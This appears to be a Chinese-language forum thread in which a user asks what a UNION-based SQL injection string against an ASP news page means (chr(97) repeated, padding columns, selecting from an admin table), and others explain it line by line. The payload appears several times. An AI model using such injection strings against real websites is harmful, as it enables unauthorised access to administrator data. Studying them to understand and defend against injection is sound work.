/news.asp?news_id=3
and 1=2 union all select
chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97),1,1,1,1
from admin where 1=1 and 1=1这个语句是联合语句对吧?
但是为什么使用那么多+,然后还有逗号。是怎么解释的呢?不懂了。晕死。
and 1=2 union all select
chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97),1,1,1,1
from admin where 1=1 and 1=1这个语句是联合语句对吧?
但是为什么使用那么多+,然后还有逗号。是怎么解释的呢?不懂了。晕死。
联合查询.
chr,不知道什么东东,1,1,1,1 这些应该是匹配字段用的.
估计原来为变量,例如'where '+@a+'=1 and '+@b+'=1' 正好这次查询 @a='1' @b='1'
不知道写这么多A有啥用
and 1=2 union all select --1=2为否,关系为and,所以前面执行不了,
--使用union all 把结果集串联,合并起来,这里前面结是集为空,所以是后面的结果集了
chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97),1,1,1,1 --1,为列值
from admin where 1=1 and 1=1 --条件 可能